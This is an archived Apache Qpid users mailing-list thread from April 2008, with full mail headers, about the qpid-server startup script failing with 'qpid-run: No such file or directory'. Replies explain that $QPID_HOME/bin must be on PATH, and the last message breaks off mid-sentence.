Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO relay03.pair.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 21 Apr 2008 11:13:49 +0000 Received: (qmail 56495 invoked from network); 21 Apr 2008 11:14:07 -0000 Received: from unknown (HELO ?161.129.204.104?) (unknown) by unknown with SMTP; 21 Apr 2008 11:14:07 -0000 X-pair-Authenticated: 161.129.204.104 Message-ID: <[email protected]> Date: Mon, 21 Apr 2008 16:44:07 +0530 From: Suran Jayathilaka <[email protected]> Organization: WSO2 User-Agent: Thunderbird 161.129.204.104 (X11/20080227) MIME-Version: 1.0 To: [email protected] Subject: Unable to run qpid-server from $QPID_HOME directory X-Enigmail-Version: 0.95.6 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi, According to the getting-started page for Qpid java broker ( http://cwiki.apache.org/qpid/getting-started-guide.html ), the broker startup script qpid-server should be run from the root for the Qpid installation folder. But when I try to run the broker with "bin/qpid-server" or "./bin/qpid-server" it fails with "bin/qpid-server: line 31: qpid-run: No such file or directory" I could run the broker by typing "./qpid-server" or ". qpid-server" in the QPID_HOME/bin folder. Am I doing something wrong is the instruction incorrect? I have set the QPID_HOME variable. I tried this with downloaded M2 as well as locally built M3-SNAPSHOT. Thanks. Suran. From [email protected] Mon Apr 21 11:20:39 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20525 invoked from network); 21 Apr 2008 11:20:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Apr 2008 11:20:37 -0000 Received: (qmail 59221 invoked by uid 500); 21 Apr 2008 11:20:37 -0000 Delivered-To: [email protected] Received: (qmail 59209 invoked by uid 500); 21 Apr 2008 11:20:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59200 invoked by uid 99); 21 Apr 2008 11:20:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 04:20:37 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wa-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 11:19:51 +0000 Received: by wa-out-1112.google.com with SMTP id n4so3171315wag.6 for <[email protected]>; Mon, 21 Apr 2008 04:20:05 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; bh=VF/jATc9zT4RBagkcQDnN1R8aJ3hSlnhl4eZTpH8d6w=; b=DkDtH1dhcMZDFsMEFlWRgzwbMZvdj+YyoxwX6ZKsSvDEziRrigUzAVXlsTtuwcOnQmuwoI24Phb7Ye9T4QB64h+e5ECe/hvJLhS0bOAJPHkfDljNGygyCIM9hh1g+f2GgeKdCwaJg21carHbaY4SQaYtgKqTxRFxKnClrpY4/34= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=mfJZ+d7aTF5C1LvE+2TrWuaKewTZRHwW6gdZKXazDayRey6gESqDT+8dEJ6ACZ3uBkvaViIicfhlL3P9SY1TYQ2G6Ged/VqU8s7QlOxW41svIMDWScj9+qQgwcZESVqkAiaZEagGQ9p84roOJ+qKFGYgbLdcsqicu/a/agOox7Q= Received: by 161.129.204.104 with SMTP id r1mr5668047waf.40.1208776805054; Mon, 21 Apr 2008 04:20:05 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 21 Apr 2008 04:20:05 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 21 Apr 2008 12:20:05 +0100 From: "Aidan Skinner" <[email protected]> Reply-To: [email protected] Sender: [email protected] To: [email protected] Subject: Re: Unable to run qpid-server from $QPID_HOME directory In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Google-Sender-Auth: d24e9b0d7e2d4ad3 X-Virus-Checked: Checked by ClamAV on apache.org On Mon, Apr 21, 2008 at 12:14 PM, Suran Jayathilaka <[email protected]> wrote: > Am I doing something wrong is the instruction incorrect? I have set the > QPID_HOME variable. I tried this with downloaded M2 as well as locally built > M3-SNAPSHOT. You need to add $QPID_HOME/bin to PATH for this to work cleanly. The documentation should be updated. - Aidan -- aim/y!:aidans42 g:[email protected] http://aidan.skinner.me.uk/ "We belong to nobody and nobody belongs to us. We don't even belong to each other." From [email protected] Mon Apr 21 11:21:45 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20821 invoked from network); 21 Apr 2008 11:21:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Apr 2008 11:21:45 -0000 Received: (qmail 64822 invoked by uid 500); 21 Apr 2008 11:21:46 -0000 Delivered-To: [email protected] Received: (qmail 64802 invoked by uid 500); 21 Apr 2008 11:21:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64793 invoked by uid 99); 21 Apr 2008 11:21:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 04:21:46 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 11:21:03 +0000 Received: by yw-out-1718.google.com with SMTP id 4so896667ywq.0 for <[email protected]>; Mon, 21 Apr 2008 04:21:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=EVSJCTm/K2JvP2SQA6eVOcAwz6K1BpEtPlxhOD2n7g0=; b=ejtuOaWBVaTFOxK+OvcRThZLePtatXRl1qVAhIxxaNJnPsEgAuwCAZOK+TJ/k3so5XwQ9lIAo6tcmnbcv8ph40FlSR9UqaOtzOQlsxcwgA595W3HM9zkzHacRHPFcXPItV8eghVcZKwrKWklcMh0VDyNJK9kPBACknNCQqabZvw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=qniONyyXFLVKpFVIoqUo45BsSqQsKEECWL2VJtocF08ytBDMGYzgn+QCTPcpPpa07ghJjAJDyNoFMv+6NCwnJnPrYYiuwMaPj67uJ/TkbhZ3mhnVw/NjVxqtTYfqgoLuNYEXeX4Q3YjTXDJf3P37XTEyMTU/89wXgonbQSzKoG0= Received: by 161.129.204.104 with SMTP id b16mr6736161ybh.115.1208776868027; Mon, 21 Apr 2008 04:21:08 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 21 Apr 2008 04:21:08 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 21 Apr 2008 12:21:08 +0100 From: "Robert Greig" <[email protected]> To: [email protected] Subject: Re: Unable to run qpid-server from $QPID_HOME directory In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 21/04/2008, Suran Jayathilaka <[email protected]> wrote: > Am I doing something wrong is the instruction incorrect? I have set the > QPID_HOME variable. I tried this with downloaded M2 as well as locally built > M3-SNAPSHOT. No, it looks like the instructions are wrong. Looking at the qpid-server script, it won't run unless you are in QPID_HOME/bin. I think however that this is really a bug in the script and that it should be fixed to run from anywhere. RG From [email protected] Tue Apr 22 01:33:18 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76010 invoked from network); 22 Apr 2008 01:33:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Apr 2008 01:33:18 -0000 Received: (qmail 29694 invoked by uid 500); 22 Apr 2008 01:33:19 -0000 Delivered-To: [email protected] Received: (qmail 29681 invoked by uid 500); 22 Apr 2008 01:33:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29672 invoked by uid 99); 22 Apr 2008 01:33:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 18:33:19 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wa-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 01:32:36 +0000 Received: by wa-out-1112.google.com with SMTP id n4so3652190wag.6 for <[email protected]>; Mon, 21 Apr 2008 18:32:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=PIBMZZRVf6xkNCQXLrV68WvnPeTi4fUkhgEfQfVGUCk=; b=shqt0/9gNVKj0Wtm+wvWjinFZsHa9cOw0psYoDH9s30poUYkWDps1PEWZoc2WZCI+mgg/RCiS6p1odjaP8IJ3RWMRcuMPSI4w7/4atRRY2LbVzIblMRBOF9xpztJVdVvL77D9qTH4h1e3KnM9/kTHG57s5cl6O5hUF/cCC/rExE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=l6PjPO6x3CVPjKJVw0qkEdpvgoht3RXr1cQV9Mz4H/kST1T3Wl/iIisNzO6sSBRMt2VJPsRV7+kGoRf3VbnC6FWrH7oUP4hPzv6+5OChJ09FlUY+v2qMaJpy98eaB7ILPQRZBddN9C8ghk+DxcVr6K4Pr9RSpm4djfdTxKmHdno= Received: by 161.129.204.104 with SMTP id l1mr6764417wac.226.1208827966865; Mon, 21 Apr 2008 18:32:46 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 21 Apr 2008 18:32:46 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 22 Apr 2008 07:02:46 +0530 From: "lahiru gunathilake" <[email protected]> To: [email protected] Subject: Re: Unable to run qpid-server from $QPID_HOME directory In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_6820_23348583.1208827966869" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_6820_23348583.1208827966869 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi devs, I have gone through same problem when I'm trying to build Qpid but I thought that was my mistake. Thanks Suran to pointing this out. Regs lahiru On Mon, Apr 21, 2008 at 4:51 PM, Robert Greig <[email protected]> wrote: > On 21/04/2008, Suran Jayathilaka <[email protected]> wrote: > > > Am I doing something wrong is the instruction incorrect? I have set the > > QPID_HOME variable. I tried this with downloaded M2 as well as locally > built > > M3-SNAPSHOT. > > No, it looks like the instructions are wrong. Looking at the > qpid-server script, it won't run unless you are in QPID_HOME/bin. > > I think however that this is really a bug in the script and that it > should be fixed to run from anywhere. > > RG > ------=_Part_6820_23348583.1208827966869-- From [email protected] Tue Apr 22 08:54:08 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43804 invoked from network); 22 Apr 2008 08:54:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Apr 2008 08:54:08 -0000 Received: (qmail 52479 invoked by uid 500); 22 Apr 2008 08:54:09 -0000 Delivered-To: [email protected] Received: (qmail 52460 invoked by uid 500); 22 Apr 2008 08:54:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52449 invoked by uid 99); 22 Apr 2008 08:54:08 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 01:54:08 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 08:53:22 +0000 Received: by yw-out-1718.google.com with SMTP id 4so1117801ywq.0 for <[email protected]>; Tue, 22 Apr 2008 01:53:35 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=512uo/34epHuqo3uRUp4vf6yYJNPLLyw7zCBaaMW+BU=; b=ksRE1pS0quioNsR6TDy+Zr818GIDQ3OFfg2aTZMQdRjU9WtTvLbhNXFDQ7W9eAPFnDQBqB3zO1iLvEjTsi1KNk7rBsRmnTs1xay3YcTW7KJUFiMy3QAxGRU3JfdF+XRYzo91JdWrN8eGh5iN/OIXlgZGmX9YyMyUhsbRvd47TeA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=U0Ez9eioVWdUo5KXwtVZWFjbaxBZYX4Y63Mvd4o6EajN91mgDoGlvfFuLAHeq87XLLxXp1Npn4572C1iBVhyDgb9C0nhrsE9mG6G8ymohmPO1frBW3HTJEF0YNoGAS+cbPFtvSVUTMncF7MKjEaDtfWDRtxQ0A9IFgZcYAvRl3I= Received: by 161.129.204.104 with SMTP id g17mr2102612wfe.157.1208854414408; Tue, 22 Apr 2008 01:53:34 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 22 Apr 2008 01:53:34 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 22 Apr 2008 09:53:34 +0100 From: "Marnie McCormack" <[email protected]> To: [email protected] Subject: Re: Unable to run qpid-server from $QPID_HOME directory In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_15950_9477886.1208854414400" References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_15950_9477886.1208854414400 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi All, Firstly, thanks Suran for pointing this out. I have updated the docs to reflect the need to have the $QPID_HOME/bin dir on your path before running qpid-server. The qpid-server script just assumes you have qpid-run on your path, so this will work (does work). Hth, Marnie On 4/22/08, lahiru gunathilake <[email protected]> wrote: > > Hi devs, > I have gone through same problem when I'm trying to build Qpid but I > thought > that was my mistake. > Thanks Suran to pointing this out. > > Regs > lahiru > > > On Mon, Apr 21, 2008 at 4:51 PM, Robert Greig <[email protected]> > wrote: > > > On 21/04/2008, Suran Jayathilaka <[email protected]> wrote: > > > > > Am I doing something wrong is the instruction incorrect? I have set > the > > > QPID_HOME variable. I tried this with downloaded M2 as well as locally > > built > > > M3-SNAPSHOT. > > > > No, it looks like the instructions are wrong. Looking at the > > qpid-server script, it won't run unless you are in QPID_HOME/bin. > > > > I think however that this is really a bug in the script and that it > > should be fixed to run from anywhere. > > > > RG > > > ------=_Part_15950_9477886.1208854414400-- From [email protected] Tue Apr 22 14:09:30 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88924 invoked from network); 22 Apr 2008 14:09:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Apr 2008 14:09:30 -0000 Received: (qmail 7502 invoked by uid 500); 22 Apr 2008 14:09:25 -0000 Delivered-To: [email protected] Received: (qmail 7458 invoked by uid 500); 22 Apr 2008 14:09:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7411 invoked by uid 99); 22 Apr 2008 14:09:24 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 07:09:24 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rn-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 14:08:40 +0000 Received: by rn-out-0910.google.com with SMTP id s46so739439rnb.3 for <[email protected]>; Tue, 22 Apr 2008 07:08:53 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=Ui2ypBKx9MEXqp8EtzTpEaVknONGmVSPYzqsygY9rpI=; b=BWdhRd8Qm1oR+xoN0p1FglYkQez5RSXeDZRsL6TDMNg5+/hFbsRj//pNbYhBMi8lqUfGsfdIn9QO9Qfsx1627w8Qq6KrUbOyXMs8IR2xQGtY1sQ7ONcgTvNmATHGcVu4Trm8iwq0YmqrdKoEcHXdcedgVhqak5WXYruLSJJfCqw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=mRbFJk+gUdaZO/Qg6UGMJv8z25HWgyEo9IdQG8squwBmKrjhqvyAik9Ns+d1F3iOd4f7iWsyXBVY60BFfHWCBXT/73SSeujvk6vIpJJFQWYoqJiONRLQQiKr3igcuEnIAmDrgpEHreiHQQdKuH/H6AMIU3P6arEA7LBq4gpe4B8= Received: by 161.129.204.104 with SMTP id t1mr285293wac.67.1208873331956; Tue, 22 Apr 2008 07:08:51 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 22 Apr 2008 07:08:51 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 22 Apr 2008 19:38:51 +0530 From: "lahiru gunathilake" <[email protected]> To: [email protected] Subject: Re: Unable to run qpid-server from $QPID_HOME directory In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_9105_9487107.1208873331947" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_9105_9487107.1208873331947 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi All, I did these things with qpid but still I couldn't start the server. 1. SVN check out of the trunk 2. mvn -Pfastinstall in trunk/qpid/java/ 3. mvn in trunk/qpid/java/distribution 4. set the PATH and QPID_HOME variables like this QPID_HOME="/home/lahiru/trunk/qpid/java/broker/" PATH="/home/lahiru/trunk/qpid/java/broker/bin/" 5. cd $QPID_HOME/bin 6. ./qpid-server But still it give the same error as suran inform at the beginning of this thread. ./qpid-server: line 31: qpid-run: No such file or directory Can anybody help me to figure this out. Thanks in advance lahiru On Tue, Apr 22, 2008 at 2:23 PM, Marnie McCormack < [email protected]> wrote: > Hi All, > > Firstly, thanks Suran for pointing this out. > > I have updated the docs to reflect the need to have the $QPID_HOME/bin dir > on your path before running qpid-server. The qpid-server script just > assumes > you have qpid-run on your path, so this will work (does work). > > Hth, > Marnie > > > > > On 4/22/08, lahiru gunathilake <[email protected]> wrote: > > > > Hi devs, > > I have gone through same problem when I'm trying to build Qpid but I > > thought > > that was my mistake. > > Thanks Suran to pointing this out. > > > > Regs > > lahiru > > > > > > On Mon, Apr 21, 2008 at 4:51 PM, Robert Greig <[email protected]> > > wrote: > > > > > On 21/04/2008, Suran Jayathilaka <[email protected]> wrote: > > > > > > > Am I doing something wrong is the instruction incorrect? I have set > > the > > > > QPID_HOME variable. I tried this with downloaded M2 as well as > locally > > > built > > > > M3-SNAPSHOT. > > > > > > No, it looks like the instructions are wrong. Looking at the > > > qpid-server script, it won't run unless you are in QPID_HOME/bin. > > > > > > I think however that this is really a bug in the script and that it > > > should be fixed to run from anywhere. > > > > > > RG > > > > > > -- East or West Mahindians are the Best... ! ------=_Part_9105_9487107.1208873331947-- From [email protected] Tue Apr 22 14:13:29 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91933 invoked from network); 22 Apr 2008 14:13:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Apr 2008 14:13:29 -0000 Received: (qmail 13092 invoked by uid 500); 22 Apr 2008 14:13:30 -0000 Delivered-To: [email protected] Received: (qmail 13076 invoked by uid 500); 22 Apr 2008 14:13:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13065 invoked by uid 99); 22 Apr 2008 14:13:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 07:13:30 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 14:12:45 +0000 Received: by yw-out-1718.google.com with SMTP id 4so1176169ywq.0 for <[email protected]>; Tue, 22 Apr 2008 07:12:58 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; bh=6LJD9cJ1k72ANnjjYZ7dD6N/T/h35eu3kTNtvf+DHgo=; b=d6AyXQurXlXrHeEMYug3tG2WVNAcFAXygAnZRuuj40E1EkcaYtMVoTQbrbKbUf9w/rtpwKldIez3Iphn/ssTObIZByFSSf/kcc8Wayi14Vd8oMWmGHMeT31UxyZh8Q9m6I/ovQK85bjgWw4n6g/ZSGmVynR4ajVPcn+zzq2md3Y= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=AT94ofZbbthrIcWihTQngBPoDl8eoE1XQrWWnxmo7WBxYfpqvff4dmftIWr0kgLTwcW4EJtk2+fpiq52lGNvYvMHsWdDy59niBh0gjLeydhpO2uQHrI4q8r/cqGfjLc7CIkaoX/16XMC6qZRs9fuiG+dnmfrYvuLesi5STtcuUQ= Received: by 161.129.204.104 with SMTP id a19mr260178waj.200.1208873577417; Tue, 22 Apr 2008 07:12:57 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 22 Apr 2008 07:12:57 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 22 Apr 2008 15:12:57 +0100 From: "Aidan Skinner" <[email protected]> Reply-To: [email protected] Sender: [email protected] To: [email protected] Subject: Re: Unable to run qpid-server from $QPID_HOME directory In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Google-Sender-Auth: 4ae8ee151a586461 X-Virus-Checked: Checked by ClamAV on apache.org On Tue, Apr 22, 2008 at 3:08 PM, lahiru gunathilake <[email protected]> wrote: > 4. set the PATH and QPID_HOME variables like this > QPID_HOME="/home/lahiru/trunk/qpid/java/broker/" > PATH="/home/lahiru/trunk/qpid/java/broker/bin/" set QPID_HOME to distribution/target/qpid-1.0-incubating-M3-snapshot-java-bin/ and PATH to $QPID_HOME/bin:$PATH and it should work. btw, the java trunk is currently rather out of date, you probably want to be looking at branches/M2.x just now. I'm currently working on merging the two together, we'll probably land this later this week. - Aidan -- aim/y!:aidans42 g:[email protected] http://aidan.skinner.me.uk/ "We belong to nobody and nobody belongs to us. We don't even belong to each other." From [email protected] Tue Apr 22 14:26:50 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99257 invoked from network); 22 Apr 2008 14:26:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Apr 2008 14:26:50 -0000 Received: (qmail 31076 invoked by uid 500); 22 Apr 2008 14:26:52 -0000 Delivered-To: [email protected] Received: (qmail 31055 invoked by uid 500); 22 Apr 2008 14:26:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31039 invoked by uid 99); 22 Apr 2008 14:26:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 07:26:52 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rn-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 22 Apr 2008 14:26:00 +0000 Received: by rn-out-0910.google.com with SMTP id s46so750197rnb.3 for <[email protected]>; Tue, 22 Apr 2008 07:26:20 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=7L8OseDC7uAtUJ3se9wofPecZkgYLfdz2bdSJQDTVZI=; b=sg46GxUhFhox8qdCqwxGul0dOJq65l6k7Aj/cSKdUZIVpLGXNXzwsVUvXP6B9AU6Xvzl8jkB/H5J7sZRJnql24bXLvfShd7NnS4CaRS9ix86KPgA6+q7ouI/Tx4Y5v77jGRlQTpYjkZFBBS1q3uWEUTY6rYP3VbRZdDd74SPB5Q= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=hP1xKHsPIrlSHlIKghQx2hKcgkBX5xgBL4ZoD8U51WP8YnpcPjteFYVQqW2LK4HL2YI3BE8QiByvaCL7OA86VvA/MWmgrdoIEqWo1E/uMECdn7jGxIrujHoYLYRmHllv64x2yR7hXHQElYHc2ASRsCNHfNtV9za98ffZPF1bVQA= Received: by 161.129.204.104 with SMTP id q17mr316622wab.70.1208874379115; Tue, 22 Apr 2008 07:26:19 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 22 Apr 2008 07:26:19 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 22 Apr 2008 19:56:19 +0530 From: "lahiru gunathilake" <[email protected]> To: [email protected], [email protected] Subject: Re: Unable to run qpid-server from $QPID_HOME directory In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_9198_24493309.1208874379105" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_9198_24493309.1208874379105 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Aidan, It 